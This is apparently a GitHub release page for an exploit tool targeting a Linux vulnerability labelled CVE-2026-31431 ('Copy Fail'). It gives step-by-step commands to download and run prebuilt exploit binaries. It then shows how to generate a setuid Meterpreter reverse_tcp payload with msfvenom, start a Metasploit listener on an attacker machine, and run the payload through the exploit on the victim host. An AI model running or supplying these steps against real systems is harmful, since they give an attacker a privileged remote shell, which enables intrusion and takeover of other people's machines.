Skip to content

CVE-2026-31431-Linux-Copy-Fail

Latest
Latest

Choose a tag to compare

View all tags
@iss4cf0ng iss4cf0ng released this 30 Apr 07:48
· 10 commits to main since this release
v1.0.0
257e0c7

Usage

Download and extract the release package:

wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
cd CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

The binaries provide the options below:

./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Demonstration

Test Vulnerability

On the vulnerable machine:

./CVE-2026-31431-Linux-Copy-Fail --test

Exploitation

./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Use the command (set PrependSetUid to True) below to generate Meterpreter payload:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

On the attacker machine (Kali Linux):

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

On the vulnerable machine:

./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin
Assets 3
Loading